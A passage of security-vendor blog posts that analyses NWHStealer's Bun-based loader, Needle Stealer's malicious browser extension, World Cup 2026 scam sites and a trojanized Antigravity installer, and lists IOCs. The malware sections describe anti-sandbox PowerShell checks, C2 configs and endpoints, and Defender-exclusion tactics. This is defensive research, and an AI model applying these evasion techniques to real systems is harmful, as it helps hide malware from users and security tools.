      While it’s technically possible to add exclusions for individual domains, doing so would allow their traffic to load unfiltered in your browser. We don’t recommend this unless you fully understand and accept the risk.
    • Use private/incognito windows for Yahoo Mail
      Accessing Yahoo Mail in a private/incognito session can help reduce persistence of certain tracking and advertising data because the browser discards cookies and local storage when you close the window.
    • Clear cookies and site data periodically
      If you see repeated alerts, clearing Yahoo‑related cookies and cached data may reduce some of the underlying tracking behavior that triggers these redirects.
    • Consider fewer‑ads options
      Yahoo offers paid plans that reduce or remove ads, and users can also use reputable content‑blocking extensions alongside Malwarebytes to cut down on ad‑driven behavior in webmail interfaces.

    Our ongoing monitoring

    The domains and infrastructure involved in these redirects are operated outside Malwarebytes, and their configuration or behavior may change over time. We are actively monitoring telemetry, sandbox reports, and reputation data for these domains and related infrastructure, and we will adjust our detections if new information emerges.

    Our priority is to keep users safe while being transparent about why protection events occur, especially in widely used services such as webmail. If we learn more about the exact role of this component within Yahoo Mail, or if Yahoo provides additional clarity, we will update this article accordingly.


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Attackers adopt JavaScript runtime Bun to spread NWHStealer

    In our previous research, we analyzed a Windows infostealer we track as NWHStealer. The attackers behind this stealer are continuously finding new methods to distribute the stealer. During our hunting activities, we noticed how attackers are using a JavaScript runtime called Bun to help distribute it.

    Bun is a legitimate, fast, all-in-one JavaScript and TypeScript toolkit designed as a modern, high-performance replacement for Node.js. It is built from the ground up to simplify modern web development by integrating several essential tools into a single executable. 

    Its relative newness also makes it appealing for attackers. Bun has not yet been widely seen in malware campaigns, and it allows them to package malicious code into larger executables that may be less easily detected. 

    What is NWHStealer and what can it do? 

    NWHStealer is a  Rust-based stealer distributed using a range of lures and delivery methods. These include Node.js scripts, MSI installers, and, more recently, JavaScript loaders built with the Bun runtime.  

    It is often hosted on legitimate platforms such as GitHub, GitLab, MediaFire, Itch.io, and SourceForge, which helps it blend in with normal software and increases the chances of users downloading it. Attackers continue to create new profiles and lures to spread the stealer. 

    Once installed on your PC, NWHStealer can: 

    • Collect system information, including operating system, hardware, security software, user data and connected devices. 
    • Steal data from browsers, extensions and crypto wallets. 
    • Steal data from different applications, including FTP applications such as FileZilla, CoreFTP and messaging apps such as Steam and Discord. 
    • Inject malicious code into browser processes and run additional payloads (e.g. XMRig).
    • Attempt to bypass User Account Control (UAC). 
    • Achieve persistence via scheduled tasks. 
    • Get new command-and-control (C2) addresses from Telegram. 

    How to stay safe 

    Attackers are constantly adapting their techniques, and the use of newer tools like Bun shows how they try to stay ahead of detection. 

    NWHStealer is particularly concerning because of how widely it is distributed, and the types of data it targets. Stolen browser data, saved passwords, and cryptocurrency wallet information can quickly lead to account takeovers, financial loss, and further compromise. 

    Here are a few simple ways to stay safe: 

    • Only download software from official websites. 
    • Be cautious with downloads from platforms like GitHub, SourceForge, or file-sharing platforms unless you trust the source. 
    • Attackers are continuing to create new profiles to distribute this stealer across platforms.  Check the profile/developer/publisher’s profile, reputation, and how new it is when downloading something from file hosting providers or blogs. 
    • Check the structure of the archives, that the content, images, txt files are consistent with what you downloaded. Also check the archive name, they usually have recognizable patterns. 
    • Check the file’s publisher and signature before you run it. 

    Safer. Cleaner. Ad-free browsing.


    Pro tip: Install Malwarebytes Browser Guard to block malicious sites before they load. 


    Technical analysis

    The new distribution method: Bun JavaScript Runtime 

    According to its official site, Bun is an all-in-one JavaScript, TypeScript & JSX toolkit. It’s built from scratch in Zig and powered by Apple’s JavaScriptCore engine, with a focus on fast startup and low memory usage.

    Bun is composed of four main components: 

    • JavaScript Runtime: a JavaScript runtime designed as a drop-in replacement for Node.js. 
    • Package Manager: a fast alternative for npm. 
    • Test Runner: a built-in, Jest-compatible runner that executes tests much faster than standard runners. 
    • Bundler: replaces tools like Webpack, Vite, or esbuild for packaging code. 

    In recent campaigns, we detected that NWHStealer is being distributed using a Bun JavaScript Runtime bundle.  

    As we saw in our previous research, game-related and other software lures are used to start the infection chain. Some of the detected ZIP names in these recent campaigns include: 

    • Game-related software and cheats such as: 
      • MOUSE_PI_Trainer_v1.0.zip
      • FiveM Mod.zip
      • VampireCrawlers_Trainer_v1.0.zip
      • MagicalPrincess_Trainer_v1.0.zip 
      • TerraTechLegion_Trainer_v1.0.zip 
    • Other software such as: 
      • TradingView-Activation-Script-0.9.zip 
      • AutoTune 2026.zip
      • Metatune by Slate Digital 2026.zip
      • GoGoTv_Plus.zipAutodesk.zip

    In the case analyzed in this article, the infection chain starts with an archive containing Installer.exe, which embeds JavaScript code bundled with the Bun runtime. 

    The “DW” folder contains another loader, called dw.exe. This self-injection loader is similar to the one analyzed previously, but with a different decryption routine. This loader is not present in all ZIP files analyzed. 

    The malicious ZIP contains two loaders
    The malicious ZIP contains two loaders 

    The Readme.txt file asks the user to manually launch dw.exe if the main .exe file fails to run properly. This gives the attacker two ways to distribute the stealer if the C2 of the main Bun loader is offline. The loader in dw.exe works independently from the Bun JavaScript loader. 

    The Readme file inside the ZIP archive
    The Readme file inside the ZIP archive
    The fake Build Tools setup shown if dw.exe is started
    The fake Build Tools setup shown if dw.exe is started

    In this article, we don’t analyze dw.exe, as it’s a variant of the previous loaders. Instead, we focus on the JavaScript loader executed with the Bun JavaScript runtime. 

    Analysis of the JavaScript Loader  

    The executed JavaScript code by the Bun JavaScript runtime is inside the .bun section and is obfuscated.  

    The .bun section with the obfuscated JavaScript code
    The .bun section with the obfuscated JavaScript code 

    The malicious code is implemented in two parts of the code: 

    • sysreq.js: performs the anti-virtualization checks with a score system. 
    • memload.js: communicates with the C2 server, performs decryption and loads the next stage. 
    Entry point of the JavaScript loader

    The loader runs several PowerShell CIM (Common Information Model) commands and WMI (Windows Management Instrumentation) commands to detect virtual environments. There are different controls related to CPU numbers, disk space, screen resolution, USB devices, hardware manufacturers and products, number of installed software, presence of specific folders such as Browser folders, number of running processes and username. A scoring system is implemented, and based on this score, the loader decides whether to continue with the infection or terminate it.

    To detect a virtual environment, the loader executes more than 10 PowerShell commands, such as: 

    • Get-CimInstance -ClassName Win32_DiskDrive | Select-Object Model  
    • Get-CimInstance -ClassName Win32_PhysicalMemory | Select-Object Manufacturer,Speed  
    • Get-CimInstance -ClassName Win32_BIOS | Select-Object Manufacturer  
    • Get-CimInstance -ClassName Win32_BaseBoard | Select-Object Manufacturer,Product  
    • Get-CimInstance -ClassName Win32_DiskDrive | Select-Object PNPDeviceID 
    • (Get-Process -ErrorAction SilentlyContinue).Count 

    The results are compared against different strings, for example:

    • Virtualization indicators: qemu, seabios, bochs, vbox, vmware, virtualbox, kvm, xen, parallels, virtio, vmbus, red hat, edk ii
    • Username sandbox: sandbox, malware, virus, sample, vmuser, wdagutilityaccount, defaultuser0
    • MAC associated with virtual environments

    The strings are decrypted using XOR and base64 decoding; there are arrays of tuples and each contains the encrypted strings and a key used for XOR decryption. 

    Encrypted data with XOR keys
    Encrypted data with XOR keys 

    Several functions handle string decryption, including one that decrypts the config used in the C2 communication. Partial config: 

    C2 server: https://silent-harvester.cc
    BUILD_ID: 0ddbfec60307
    C2 Path: /api/status, /api/update

    The loader obtains and sends an initial request to the endpoint https://C2-server/api/report with encrypted data about the compromised system: 

    • Public IP obtained with a request to api.ipify.org. 
    • System information 
    • Anti-VM result 
    • Base-64 encoded screenshot 
    • Timestamp 

    Then it makes two GET HTTP requests: 

    • https://C2-server/api/status?v={BUILD_ID}, to obtain the seed used for AES key derivation. 
    • https://C2-server/api/update?v={BUILD_ID}, to obtain the encrypted payload with AES nonce and authentication tag. 

    The next stage is decrypted using AES-256-CBC, with the AES data returned by the C2 and loaded with a self-injection loader using the following APIs: 

    • VirtualAlloc 
    • VirtualProtect 
    • LoadLibraryA 
    • GetProcAddress 
    • RtlAddFunctionTable
    • CreateThread 
    • SearchPathA 

    These Win32 APIs are executed through the Bun module bun:ffi, which allows JavaScript to call native libraries. 

    At the end of this process, NWHStealer was deployed in the analyzed cases. 

    Indicators of Compromise (IOCs) 

    Domains 

    whale-ether[.]pro: NWH Stealer C2 server 

    cosmic-nebula[.]cc: NWH Stealer C2 server 

    silent-harvester[.]cc: Bun Loader C2 server 

    silent-orbit[.]cc: Bun Loader C2 server 

    support-onion[.]club: Bun Loader C2 server 

    Hash 

    d3a896f450561b2546b418b469a8e10949c7320212eb1c72b48e2b1e37c34ba5 

    96fe4ddfe256dc9d2c6faea7c18e2583cd9d9c0099a4ad2cf082f569ee8379f4 

    3710fb27d2032ef1eb1252ebf5c4dd516d2b2c0a83fb82c664c89e504b990fa9 

    33d07aa24b217f27df6a483295c817da198e12511a6989bcc6b917feaf8e491d 

    5427b4cefb329ed0e9585b3ce58a2788baf87e3b0c7221373f9bbd5f32c85b62 

    308da9f49ffa1d1744e428b567792ab22712159974e9da8d8e0414ecd81de93e 

    021838f30a43026084978bce187c165c6b640d8d474ec009d48078d21ec62025 

    c8e96b55f13435c4b43b7209d2403f1a0e0f9deb05edc50e0f777430be693b07 

    0614c4cc6375ab6bdcdd2dfa913a67d32c3e8be9b95a4a2aa09bb131b98191c8 

    0020999b2e3e4d1b2cfb69e4df9440d3ce05d508573889fdc12b724ce75a0cd8 

    0fa42df08cc467ec52b2d388b5575114a8ec067d13f6b1a653ec33fe879f88ca 

    15f79980650393d182f81cd6e389210568aa1f5f875e515efe6cb9485d64b7fb 

    20454ba58d509300fd694ae6159db4efa1b7ff965f98c29e7d087e20f96578c1 


    CNET Editors' Choice Award 2026

    “One of the best cybersecurity suites on the planet.” 

    According to CNET. Read their review


    •  

    The 2026 World Cup scam economy is already running before the first whistle

    The FIFA World Cup 2026 is scheduled to begin June 11 across the US, Canada, and Mexico. The web is filling with sites impersonating ticket vendors, telecoms, sticker publishers, toy manufacturers, immigration services, and crypto projects, all linked to the World Cup brand. Together, they map out four recurring patterns of fraud and risk targeting fans.

    What World Cup fans need to know

    If you’re planning anything around the 2026 World Cup, whether it’s buying a ticket or merchandise, booking a flight, applying for a US visa, or speculating on “World Cup” crypto, expect a surge in scams and other risky World Cup-related activity.

    The good news is the patterns are obvious once you know what to look for:

    • Countdown timers that reset when you reload the page
    • Prices 80–90% below retail
    • The word “official” used without a clear link to the brand behind it
    • Crypto tokens claiming to be “official” World Cup products

    Your headline rule for the next two months: If a site uses the World Cup or a known brand to get your money, stop and verify it from the official source before you do anything else.

    How these World Cup scams work

    The path to these scam sites is almost always the same: a fan searches for something on search engines or social media (for example, “World Cup 2026 jersey,” “buy Panini sticker album,” “visa to attend the World Cup,” “FIFA World Cup token”) and lands one of the hundreds of sites set up to exploit that demand.

    Often the route there runs through an ad network. That might involve a sponsored search result, a banner on an unrelated site, or a redirect chain that sends the victim to a different domain than the one they clicked. (Note that tools like Malwarebytes Browser Guard can block malicious ads, scam domains, and redirect chains before the page loads.)

    The branding on the destination site is consistent with the legitimate company. There are testimonials and satisfied-customer counts, so nothing looks immediately wrong. Urgency tricks like “Only a few items left” and the countdown timer are there to prevent you from looking too closely or investigating too deeply.

    We’ve found these sites group naturally into four categories: crypto, travel, merchandise, and predictors. The sites in each category have their own tells, but they’re united by brand parasitism: borrowing authority from FIFA, the host nations, or a real licensee like LEGO or Panini.

    Crypto

    The most crowded category is crypto, and the biggest risk comes from sites that claim or imply official links to the World Cup.

    One site marketed its token as “the official community token celebrating the FIFA World Cup 2026,” advertising a “Mega Airdrop,” a 7-billion-token total supply, and a participant counter pinned to the symbolic number 48 (the count of qualified national teams). Another shows FIFA’s official mascot, using tournament branding to sell an unlicensed token.

    None of the sites we examined are connected to FIFA. FIFA does have a real digital-collectibles ecosystem—the FIFA Collect NFT marketplace, the Right-to-Buy ticket NFTs, and the FIFA Rivals game on the Mythos chain—all of which sit on FIFA-controlled infrastructure and are documented at FIFA’s own domains. None of the sites we examined sit inside that ecosystem. The real partners for 2026 are documented and easy to verify. “World Cup token” is not one of them.

    We found multiple sites using FIFA branding to create a false sense of legitimacy. But there’s a real risk you’ll receive nothing, receive something you can’t sell, or sign a transaction that gives the operator access to your wallet.

    Some sites don’t pretend to be official, but still carry risk to World Cup fans. One Solana-based token branded itself the “World Cup Rug Index,” with the tagline “Every match is a market. Every loss is a rug,” and a contract ending in “pump,” the signature of pump.fun launches.

    In crypto, a “rug” is when early holders sell and the price collapses, leaving later buyers with losses. These projects are not scams in the sense of pretending to be something they’re not. They are openly speculative. The risk is in the structure: early buyers can sell into demand from later buyers, who are left holding the losses.

    This is different from the fake “World Cup tokens” above. Those rely on FIFA branding to create a false sense of legitimacy. These rely on momentum, where most participants arrive late.

    • There is no official World Cup token
    • There is no official World Cup token
    • There is no official World Cup token
    • There is no official World Cup token

    Travel

    The most dangerous category is the “World Cup visa.” One site, WC2026 Visa, advertised a “Visa to the World Cup 2026 US” for $270 per person, with a “98% Success Rate,” a countdown to June 11, and the standard reassuring trio: “Secure Process,” “Fast Processing,” “18+ only.”

    There is no such product. The US Department of State has stated this directly: there is no special tournament visa. Foreign visitors traveling to the United States for the World Cup must use the same B1/B2 visitor visa, or the Visa Waiver Program with an ESTA authorisation, that any other tourist would. The only tournament-specific visa programme is FIFA PASS (the Priority Appointment Scheduling System), a routing mechanism that gives ticket holders earlier interview slots at US consulates. It doesn’t bypass the interview, it doesn’t issue a visa, it doesn’t cost $270, and access to it begins with buying a ticket directly from FIFA.

    A site advertising a dedicated “World Cup visa” tricks people into believing they’re going down an official immigration pathway. Any personal data harvested in the process, such as passport details, date of birth, travel plans, and in some flows a payment instrument, gives the operator all the data they need for identity theft. Fans should only apply through .gov sites in the US, .gc.ca in Canada, and .gob.mx in Mexico.

    Travel portals aggregating tickets, flights, and hotels, and eSIM sites selling connectivity for the tournament are not inherently fraudulent and are often real businesses. But any site invoking the World Cup deserves the same scrutiny: who actually fulfils this product, what is the refund policy in writing, and is this domain legitimately connected to a known brand or partner?

    • Scam site selling World Cup tickets
    • Scam site offering Visas
    • Scam site selling World Cup tickets
    • Scam site selling eSIMs

    Merchandise

    The merchandise category is where the impersonation gets most aggressive, because there are real licensees to imitate. LEGO’s partnership with FIFA is genuine, announced in late 2025. It debuted with the LEGO Editions FIFA World Cup Official Trophy, joined in 2026 by player sets featuring Messi, Ronaldo, Mbappé, and Vinicius Jr. A whole cluster of LEGO-styled scam storefronts now prices the trophy set at €29.99, marked down from €299.99, an 83–90% discount. LEGO does not discount its premium licensed sets by 90%.

    Related to those storefronts is the “LEGO FIFA World Cup 2026 Quiz Challenge” pattern, promising “exclusive edition rewards” for fans who complete a quiz. Quiz-funnel scams are a long-running affiliate-marketing genre, and the typical mechanic is to harvest contact information and push the user toward a subscription billing flow disguised as a shipping fee for the “prize.” LEGO does not run quiz funnels. Its real World Cup activity runs through LEGO.com and physical LEGO stores.

    Counterfeit jersey storefronts have been a fixture of the open web for years, and the World Cup cycle multiplies them. Typical examples: a site branded simply “JERSEY 2026 World Cup” selling a Portugal home shirt with a “BUY 2, PAY FOR 1” overlay, a 30-day countdown, and a Trustpilot-shaped widget claiming over ten thousand satisfied customers; or a retro-jersey storefront offering Germany and Argentina shirts at $24.90 each. Search demand spikes during a World Cup year and counterfeit storefronts spin up to meet it; many will be offline shortly after the tournament ends.

    Then there is the Panini-styled storefront pattern: pages advertising the official 2026 sticker album under headers like “ONE-TIME PURCHASE BY NIF” (NIF being the Portuguese personal tax identifier, a phrase that appears nowhere in legitimate Panini commerce). These pages combine sub-ten-minute countdowns, inventory counters (“There are still 127 Units”), and country-specific scarcity claims (“Only 5,000 units available for Portugal!”).

    The high-pressure funnel and unusual NIF framing point to localised affiliate or look-alike storefronts, not Panini’s own commerce flow, which runs through paninistore.com and licensed retail. These are not Panini storefronts. They are look-alike commerce flows using Panini’s brand to sell through high-pressure funnels. Whether the product arrives or not, the user is not buying from the company they think they are.

    • Fake World Cup jersey site
    • Fake Panini site
    • Fake World Cup Lego site
    • Fake World Cup jersey site
    • Fake World Cup jersey site
    • Fake World Cup Lego site
    • Fake World Cup Lego site
    • Fake World Cup Lego site

    Predictions and prize pools

    “WorldCup Predictor” sites present a prize pool that supposedly grows with every prediction, and ask users to select a champion team from flag tiles. You are paying for entries into a pooled outcome tied to the tournament.

    These sites are not pretending to be something they’re not. The risk is that they operate without clear oversight. There is no visible licensing, no clear jurisdiction, and no way to verify from the front end whether payouts are enforced or even guaranteed.

    Licensed sportsbooks and regulated platforms typically do not present themselves this way. They identify their licensing authority, provide responsible gambling tools, and use verified payment processors. A “Login to play” button, a flag picker, and a floating prize pool are not the same thing.

    • “World Cup Predictor” sites are paid-entry pools, closer to unlicensed betting
    • “World Cup Predictor” sites are paid-entry pools, closer to unlicensed betting

    What FIFA, the brands, and the platforms could be doing better

    Many of these sites would not exist, or would be far shorter-lived, if a few things changed upstream. Brand owners with active 2026 partnerships—LEGO, Panini, the national federations, the kit manufacturers—could reduce confusion by publishing a single canonical page each, well before kickoff, listing authorized retailers and the exact SKUs and prices of their World Cup products. Someone trying to verify whether a €29.99 LEGO trophy is real should not have to triangulate between Brickset, LEGO’s newsroom, and a third-party blog.

    FIFA’s own licensing communications have improved compared with past tournaments, and the LEGO and Panini announcements were clearly disclosed on inside.fifa.com. But the gap between “FIFA has announced a partnership” and “here are the only sites authorized to sell on FIFA’s behalf” remains wide. Closing it would make impersonation much harder.

    Search engines and ad networks carry a large share of the structural responsibility. Visa-impersonation pages are precisely the kind of sites that surface through paid search ads against terms like “world cup visa,” and platforms have the data to detect and block them at scale.

    What to do if you may have been caught

    Every World Cup cycle generates its own scam economy. 2018 had fake ticket marketplaces; 2022 leaned on phishing around Qatar’s Hayya system; 2026 is building around meme coins and visa impersonation. What’s different this time is the speed: sites can be spun up, monetized, and abandoned within weeks, and AI-generated copy, mascot art, and product images have stripped away many of the visual cues people used to rely on.

    This cycle’s scam economy moves fast, but the basics still work: treat unsolicited “World Cup” links with suspicion, type official domains yourself, and ignore pressure from countdown timers.

    If you think you’ve been caught:

    • If you entered card details: Contact your card issuer immediately and request a refund for an unauthorized or non-delivered transaction.
    • If you submitted personal or passport data: Treat it as compromised. Monitor your credit, place a fraud alert if available, and watch for targeted phishing.
    • If you connected your crypto wallet or signed a transaction: Revoke permissions, move remaining assets to a new wallet, and stop using the old one for anything valuable.
    • If you bought goods that weren’t delivered: Keep your order confirmation, URL, and payment record. Report it to your national consumer protection body (FTC in the US, Action Fraud in the UK, or your local equivalent).

    Always verify through official channels. That’s FIFA.com for tickets, paniniamerica.net or paninistore.com for stickers, LEGO.com for LEGO Editions sets, and official government sites for visas. Remember, legitimate sources do not rely on countdown timers.


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Malicious trading website drops malware that hands your browser to attackers

    During our threat hunting, we found a campaign using the same malware loader from our previous research to deliver a different threat: Needle Stealer, data-stealing malware designed to quietly harvest sensitive information from infected devices, including browser data, login sessions, and cryptocurrency wallets.

    In this case, attackers used a website promoting a tool called TradingClaw (tradingclaw[.]pro), which claims to be an AI-powered assistant for TradingView.

    TradingView is a legitimate platform used by traders to analyze financial markets, but this fake TradingClaw site is not part of TradingView, nor is it related to the legitimate startup tradingclaw.chat. Instead, it’s being used here as a lure to trick people into downloading malware.

    What is Needle Stealer?

    Needle is a modular infostealer written in Golang. In simple terms, that means it’s built in pieces, so attackers can turn features on or off depending on what they want to steal.

    According to its control panel, Needle includes:

    • Needle Core: The main component, with features like form grabbing (capturing data you enter into websites) and clipboard hijacking
    • Extension module: Controls browsers, redirects traffic, injects scripts, and replaces downloads
    • Desktop wallet spoofer: Targets cryptocurrency wallet apps like Ledger, Trezor, and Exodus
    • Browser wallet spoofer: Targets browser-based wallets like MetaMask and Coinbase, including attempts to extract seed phrases

    The panel also shows a “coming soon” feature to generate fake Google or Cloudflare-style pages, suggesting the attackers plan to expand into more advanced phishing techniques.

    Needle Stealer panel
    Needle Stealer panel

    In this article, we analyze the distribution of the stealer through a fake website related to an AI service called TradingClaw. We have detected that the same stealer is also distributed by other malware such as Amadey and GCleaner. 

    Analysis of the TradingClaw campaign

    In this campaign, the malware is distributed through a fake website advertising TradingClaw as an AI trading tool.

    Malicious TradingClaw website
    Malicious TradingClaw website

    The site itself behaves selectively. In some cases, visitors are shown the fake TradingClaw page, while in others they are redirected to a different site (studypages[.]com). This kind of filtering is commonly used by attackers to avoid detection and only show the malicious content to intended targets. Search engines, for example, see the Studypages version:

    Studypages fake page
    Google results shows the Studypages fake page

    If a user proceeds, they are prompted to download a ZIP file. This file contains the first stage of the infection chain.

    Like in the previous campaign, the attack relies on a technique called DLL hijacking. In simple terms, this means the malware disguises itself as a legitimate file that a trusted program will load automatically. When the program runs, it unknowingly executes the malicious code instead.

    In this case, the DLL loader (named iviewers.dll) is executed first. It then loads a second-stage DLL, which ultimately injects the Needle Stealer into a legitimate Windows process (RegAsm.exe) using a technique known as process hollowing.

    Needle Stealer injected in RegAsm.exe process
    Needle Stealer injected in RegAsm.exe process

    The stealer is developed in Golang, and most of the functions are implemented in the “ext” package. 

    Part of the “exe” package
    Part of the “exe” package

    What the malware does

    Once installed, the Needle core module can:

    • Take screenshots of the infected system
    • Steal browser data, including history, cookies, and saved information
    • Extract data from apps like Telegram and FTP clients
    • Collect files such as .txt documents and wallet data
    • Steal cryptocurrency wallet information

    One of the more concerning features is its ability to install malicious browser extensions.

    Malicious browser extensions

    The stealer also supports the distribution of malicious browser extensions, giving attackers a powerful way to take control of the victim’s browser.

    We identified multiple variations of these extensions, each with slightly different file structures and components. Behind the scenes, the malware uses built-in Golang features to unpack a hidden ZIP archive (often named base.zip or meta.zip) that contains the extension files, along with a configuration file (cfg.json).

    Partial cfg.json config file:

    {
      "extension_host": {},
      "api_key": "…
      "server_url": "https://C2/api/v2",
      "self_destruct": true,
      "base_extension": true,
      "ext_manifest": {
        "account_extension_type": 0,
        "active_permissions": {
          "api": [
            "history",
            "notifications",
            "storage",
            "tabs",
            "webNavigation",
            "declarativeNetRequest",
            "scripting",
            "declarativeNetRequestWithHostAccess",
            "sidePanel"
          ],
          "explicit_host": [
            "<all_urls>"
          ],
          "manifest_permissions": [],
          "scriptable_host": [
            "<all_urls>"
          ]
        },
        "commands": {
          "_execute_action": {
            "was_assigned": true
          }
        }, 
    …

    This configuration file is key. It tells the malware where to send stolen data (the command-and-control server), which malicious extension to install, and which features to enable.

    The stealer extension is dropped in a random folder in the path %LOCALAPPDATA%\Packages\Extensions. The folder contains three main files popup.jscontent.js, and background.js.   

    The malicious extension dropped
    The malicious extension dropped

    The extensions analyzed have Google-related names.

    The fake malicious extension on Edge Browser
    The fake malicious extension on Edge Browser

    What the malicious extensions can do

    The extension gives attackers near full control over the browser, with capabilities that go far beyond typical malware.

    It can:

    • Connect to a remote server using a built-in API key and regularly check in for instructions. It can also switch to backup domains if the main server goes offline.
    • Generate a unique ID to track the infected user over time.
    • Collect full browsing history and send it to a remote server (/upload).
    • Monitor what you’re doing in real time, including which sites you visit, and apply attacker-controlled redirect rules. This allows it to silently send you to different websites or alter what you see on a page, including injecting or hiding content.
    • Intercept downloads, cancel legitimate files, and replace them with malicious ones from attacker-controlled servers.
    • Inject scripts directly into web pages, enabling further data theft or manipulation.
    • Display fake browser notifications with attacker-controlled text and images.

    How it communicates with attackers

    The stealer and its extension communicate with command-and-control (C2) servers using several API endpoints. These are essentially different “channels” used for specific tasks:

    • /backup-domains/active—retrieves backup servers to stay connected if the main one is blocked
    • /upload—sends stolen data back to the attackers
    • /extension—receives instructions for redirects, downloads, and notifications
    • /scripts—downloads malicious code to inject into web pages

    How to stay safe

    Scammers are increasingly using AI-themed tools to make fake websites look legitimate. In this case, a supposed “AI trading assistant” was used to trick people into installing malware.

    To reduce your risk:

    • Download software only from official websites. If a tool claims to work with a well-known platform, check the platform’s official site to confirm it’s real.
    • Check who created the file before running it. Look at the publisher name and avoid anything that looks unfamiliar or inconsistent.
    • Review your browser extensions regularly. Remove anything you don’t recognize, especially extensions you didn’t knowingly install.

    What to do if you think you’ve been affected

    If you think you may have downloaded this infostealer:

    • Check EDR and firewall logs for communications with the C2s listed in the IOCs part.
    • From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Change all passwords and enable 2FA for accounts you have accessed from this machine.
    • Check the folder %LOCALAPPDATA%\Packages\Extensions and suspicious browser extensions.
    • If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.
    • Run a full scan with Malwarebytes.

    Indicators of Compromise (IOCs)

    HASH

    95dcac62fc15e99d112d812f7687292e34de0e8e0a39e4f12082f726fa1b50ed

    0d10a6472facabf7d7a8cfd2492fc990b890754c3d90888ef9fe5b2d2cca41c0

    Domains

    Tradingclaw[.]pro: fake website

    Chrocustumapp[.]com: related to malicious extension

    Chrocustomreversal[.]com: related to malicious extension

    google-services[.]cc: related to malicious extension

    Coretest[.]digital: C2 panel

    Reisen[.]work: C2 panel

    IPs

    178[.]16[.]55[.]234: C2 panel

    185[.]11[.]61[.]149: C2 panel

    37[.]221[.]66[.]27: C2 panel

    2[.]56[.]179[.]16: C2 panel

    178[.]16[.]54[.]109: C2 panel

    37[.]221[.]66[.]27: C2 panel

    209[.]17[.]118[.]17: C2 panel

    162[.]216[.]5[.]130: C2 panel


    We don’t just report on threats—we remove them

    Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

    •  

    Fake Google Antigravity downloads are stealing accounts in minutes

    Somebody went looking for Google’s new Antigravity coding tool this week, clicked download, ran the installer, and got exactly what they thought they were getting. Antigravity installed cleanly. A shortcut appeared on the desktop. The application opened and worked. Nothing looked or felt wrong.

    But behind the scenes, that installer can give your accounts, your data, and even your machine to an attacker, without breaking anything the user can see.

    In this article, we’ll break down the technical details of the campaign, how it works under the hood, and what to do if you think you’ve installed it.

    The download that actually gave you what you wanted

    Google Antigravity launched in November 2025 and has been one of the most searched-for developer tools on the web ever since. The real product lives at antigravity.google. Hardly anyone new to the product has the real URL memorized, so when a user reached a hyphenated lookalike (what we call a typosquat domain) at google-antigravity[.]com it was convincing enough at a glance.

    Homepage of the fake Google Antigravity for Windows site

    So they went on to download the file, called Antigravity_v1.22.2.0.exe.

    The installer isn’t simply named to look like the real one from Google. It’s 138 MB: large enough to carry the entire Antigravity application, its Electron runtime, its Vulkan graphics libraries, its updater, all of it. Because that is what is actually inside.

    The attacker didn’t build a convincing fake; they took the genuine Antigravity installer, added one additional step to run their PowerShell script during setup, and repackaged the result. The malicious step is one extra line in a sequence that runs dozens of legitimate ones. Here’s what the Setup looked like:

    The trojanized Antigravity installer Setup Wizard (1)
    The trojanized Antigravity installer Setup Wizard (2)

    How do we know it’s one line? Because you can see it.

    The MSI’s custom-action table (the list of every step the installer takes during install) contains 11 rows that are standard, boilerplate entries the installer tool generates automatically: extract files, check the Windows version, elevate to admin, write a log, clean up afterwards. Each of those has a name that starts with AI_ followed by a description of what it does. And then, sitting at the bottom of the same list, there is one more row, named wefasgsdfg — a keyboard mash the attacker typed in when the installer tool prompted them for a name, and the one that runs their PowerShell script.

    The trojanized Antigravity installer Setup Wizard (3)

    Antigravity installs properly into C:\Program Files (x86)\Google LLC\Antigravity\. A Start Menu entry appears, a desktop shortcut is placed, and everything works. The user opens the app, tries it, closes it, and goes on with their day. It all seems fine, because they actually installed the thing they wanted to install. The malicious part is happening quietly, in a folder they’ll never open.

    Two small scripts, and a phone call

    Somewhere in the middle of the install, the MSI runs a small helper script that drops two PowerShell files into the user’s temporary folder: scr5020.ps1 and pss5032.ps1. The filenames look like specifics but aren’t: the four characters after each prefix are generated fresh every time the installer runs.

    What stays constant is the prefix: scr for the user script, pss for the PowerShell wrapper, because those come from the installer tool’s standard naming pattern for custom-action scripts.

    Of the two files, the second is an unaltered Advanced Installer utility. It’s genuinely innocent and present in many real products. The first was added by the attacker, and it has one job: open an HTTPS connection to https://opus-dsn[.]com/login/, download whatever code the server sends back, and run it. To blend in, it spoofs a Microsoft referrer header and routes through the system’s default web proxy, so it inherits whatever corporate proxy configuration and authentication IT has set up, without the user noticing. It also saves and restores the parent PowerShell’s TLS setting, leaving that one global unchanged after it exits. That’s the entire script.

    Researchers call this pattern a downloader cradle, and its advantage to the attacker is flexibility. The real payload lives on their server, not inside the installer out in the wild, so they can swap it out, change targeting, or turn the operation off without touching the file users are downloading.

    The trojanized Antigravity installer phone call

    In this case, the cradle did exactly what it was built to do and no more: a DNS query for opus-dsn[.]com, a single TCP connection on port 443 to 89[.]124[.]96[.]27 with a quiet HTTPS GET to /login/, and then the PowerShell process exited.

    Nothing else happened. No second-stage script was fetched. No file was dropped. No scheduled task was created. No changes were made to Windows Defender. Most automated security tools would shrug and move on.

    But the malware hadn’t failed. It had introduced itself to the attacker’s server and asked for code to run next—and whether the answer comes back is a decision the operator gets to make later, on their own time, one victim at a time. You cannot tell, from the victim’s side, what was returned. For analysis, we retrieved what the server sends when the answer is yes.

    What arrives when the answer is yes

    When the server decides a target is worth attacking, the follow-on script does its work in three movements.

    First, it makes Defender look the other way. It calls Add-MpPreference (with the cmdlet name split by a backtick, a small obfuscation to dodge naïve string-matching detections) to exclude %ProgramData% and %APPDATA% from scanning, exclude .exe, .msi, and .dll files from scanning, and exclude PowerShell, regasm.exe, rundll32.exe, msedge.exe, and chrome.exe from scanning. Only after that does it phone home—collecting a profile of the machine (Windows version, Active Directory domain, installed antivirus product), RSA-encrypting it with a public key embedded in the script, and sending it to opus-dsn[.]com inside a utm_content query parameter that looks, in any access log, like ordinary marketing tracking. This is the profile the operator uses to decide whether this particular machine is worth the next stage.

